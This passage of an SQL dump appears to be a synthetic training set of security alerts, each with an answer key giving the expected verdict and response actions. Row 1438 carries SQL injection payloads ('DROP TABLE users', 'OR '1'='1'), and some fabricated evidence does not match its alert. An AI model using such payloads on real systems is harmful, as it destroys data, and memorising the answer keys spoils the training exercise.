2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-789\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-789\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.987Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T10:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.50\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-789\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1434, 'Phishing Attempt Detected', 'high', 'Forcepoint', 'A phishing email was received with a link to a known malicious site. The email was flagged and quarantined.', 'Phishing', 'T1566', 1, 'investigating', 247, '{\"timestamp\":\"2026-03-02T11:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.25\",\"username\":\"jdoe\",\"hostname\":\"CORP-DESK-101\",\"email_sender\":\"phisher@maliciousdomain.com\",\"url\":\"http://maliciousdomain.com/login\"}', '2026-03-02 03:22:47', '2026-03-07 01:25:08', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Email address linked to multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL used for credential harvesting attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The phishing email contains a link to a malicious domain, warranting immediate action.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.989Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-101\\\",\\\"email_sender\\\":\\\"phisher@maliciousdomain.com\\\",\\\"url\\\":\\\"http://maliciousdomain.com/login\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.989Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-101\\\",\\\"email_sender\\\":\\\"phisher@maliciousdomain.com\\\",\\\"url\\\":\\\"http://maliciousdomain.com/login\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.989Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-101\\\",\\\"email_sender\\\":\\\"phisher@maliciousdomain.com\\\",\\\"url\\\":\\\"http://maliciousdomain.com/login\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.989Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-101\\\",\\\"email_sender\\\":\\\"phisher@maliciousdomain.com\\\",\\\"url\\\":\\\"http://maliciousdomain.com/login\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.989Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T11:30:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.23\\\",\\\"dst_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-101\\\",\\\"email_sender\\\":\\\"phisher@maliciousdomain.com\\\",\\\"url\\\":\\\"http://maliciousdomain.com/login\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1435, 'Unusual Login Activity Detected', 'medium', 'Microsoft Purview', 'Multiple failed login attempts were recorded from a foreign IP address, indicating a potential brute force attack.', 'Credential Attack', 'T1078', 1, 'investigating', 237, '{\"timestamp\":\"2026-03-02T12:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.60\",\"dst_ip\":\"192.168.1.30\",\"username\":\"jdoe\",\"hostname\":\"CORP-SVR-202\",\"failed_attempts\":25}', '2026-03-02 03:22:47', '2026-03-04 16:07:10', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for multiple brute force attempts\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.30\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP address of the corporate server\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The foreign IP is associated with known brute force activities, confirming the attack.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.991Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-202\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-02T13:54:06.991Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-202\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-02T13:53:06.991Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-202\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-02T13:52:06.991Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-202\\\",\\\"failed_attempts\\\":25}\"},{\"timestamp\":\"2026-03-02T13:51:06.991Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.60\\\",\\\"dst_ip\\\":\\\"192.168.1.30\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-202\\\",\\\"failed_attempts\\\":25}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1436, 'Unauthorized Software Installation Detected', 'medium', 'Symantec DLP', 'An employee attempted to install unauthorized software on their workstation, which was detected by DLP policies.', 'Malware', 'T1059', 0, 'investigating', NULL, '{\"timestamp\":\"2026-03-02T13:00:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.35\",\"dst_ip\":\"\",\"username\":\"jdoe\",\"hostname\":\"CORP-DESK-303\",\"command_line\":\"msiexec /i C:\\\\Downloads\\\\unknownapp.msi\"}', '2026-03-02 03:22:47', '2026-03-04 16:18:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.35\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"IP address of the employee\'s workstation\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"msiexec /i C:\\\\Downloads\\\\unknownapp.msi\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Command related to software installation, not malicious\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The installation attempt was benign as the software was legitimate but unknown to the system.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.992Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.35\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-303\\\",\\\"command_line\\\":\\\"msiexec /i C:\\\\\\\\Downloads\\\\\\\\unknownapp.msi\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.992Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.35\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-303\\\",\\\"command_line\\\":\\\"msiexec /i C:\\\\\\\\Downloads\\\\\\\\unknownapp.msi\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.992Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.35\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-303\\\",\\\"command_line\\\":\\\"msiexec /i C:\\\\\\\\Downloads\\\\\\\\unknownapp.msi\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.992Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.35\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-303\\\",\\\"command_line\\\":\\\"msiexec /i C:\\\\\\\\Downloads\\\\\\\\unknownapp.msi\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.992Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T13:00:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.35\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-303\\\",\\\"command_line\\\":\\\"msiexec /i C:\\\\\\\\Downloads\\\\\\\\unknownapp.msi\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1437, 'Abnormal Data Transfer Detected', 'high', 'Forcepoint', 'A large volume of sensitive data was transferred to an external IP address, triggering a policy violation alert.', 'Data Exfil', 'T1059', 1, 'investigating', 222, '{\"timestamp\":\"2026-03-02T14:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.40\",\"dst_ip\":\"198.51.100.10\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAP-404\"}', '2026-03-02 03:22:47', '2026-03-08 14:05:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP of the user\'s laptop\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 500 times for data exfiltration activities\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external IP is linked to known data exfiltration activities, confirming malicious intent.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.994Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-404\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.994Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-404\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.994Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-404\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.994Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-404\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.994Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.40\\\",\\\"dst_ip\\\":\\\"198.51.100.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-404\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1438, 'Command Injection Attempt Detected', 'critical', 'Netskope', 'A command injection attempt was made against a web application, detected and blocked by security systems.', 'Web Attack', 'T1059', 0, 'investigating', 247, '{\"timestamp\":\"2026-03-02T15:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"203.0.113.70\",\"dst_ip\":\"192.168.1.50\",\"username\":\"webuser\",\"hostname\":\"CORP-WEB-505\",\"request_body\":\"id=1; DROP TABLE users;\"}', '2026-03-02 03:22:47', '2026-03-05 11:37:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.70\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple web attack attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"id=1; DROP TABLE users;\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"SQL injection attempt detected\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The request body contained a SQL injection payload, confirming the attack attempt.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.995Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"CORP-WEB-505\\\",\\\"request_body\\\":\\\"id=1; DROP TABLE users;\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.995Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"CORP-WEB-505\\\",\\\"request_body\\\":\\\"id=1; DROP TABLE users;\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.995Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"CORP-WEB-505\\\",\\\"request_body\\\":\\\"id=1; DROP TABLE users;\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.995Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"CORP-WEB-505\\\",\\\"request_body\\\":\\\"id=1; DROP TABLE users;\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.995Z\",\"source\":\"/var/log/nginx/access.log\",\"event_code\":\"403\",\"message\":\"GET /login.php?user=admin\' OR \'1\'=\'1 HTTP/1.1 - 403 Forbidden - IP: 203.0.113.55 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"dst_ip\\\":\\\"192.168.1.50\\\",\\\"username\\\":\\\"webuser\\\",\\\"hostname\\\":\\\"CORP-WEB-505\\\",\\\"request_body\\\":\\\"id=1; DROP TABLE users;\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/nginx/access.log\\\" | head 100\"}}', 0),
(1439, 'Possible Insider Data Leak Detected', 'medium', 'Symantec DLP', 'An employee was detected attempting to send sensitive files to a personal email address.', 'Data Exfil', 'T1059', 1, 'Closed', 266, '{\"timestamp\":\"2026-03-02T16:00:00Z\",\"event_type\":\"email_sent\",\"src_ip\":\"192.168.1.55\",\"dst_ip\":\"10.0.0.10\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAP-606\",\"email_sender\":\"jdoe@corporate.com\",\"email_receiver\":\"personalemail@example.com\"}', '2026-03-02 03:22:47', '2026-03-09 13:42:00', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"personalemail@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address linked to potential data exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP of the user\'s laptop\"}}],\"expected_actions\":[\"collect_forensics\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The email attempt to a personal address with sensitive attachments indicates a potential insider threat.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.997Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"email_sent\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-606\\\",\\\"email_sender\\\":\\\"jdoe@corporate.com\\\",\\\"email_receiver\\\":\\\"personalemail@example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.997Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"email_sent\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-606\\\",\\\"email_sender\\\":\\\"jdoe@corporate.com\\\",\\\"email_receiver\\\":\\\"personalemail@example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.997Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"email_sent\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-606\\\",\\\"email_sender\\\":\\\"jdoe@corporate.com\\\",\\\"email_receiver\\\":\\\"personalemail@example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.997Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"email_sent\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-606\\\",\\\"email_sender\\\":\\\"jdoe@corporate.com\\\",\\\"email_receiver\\\":\\\"personalemail@example.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.997Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 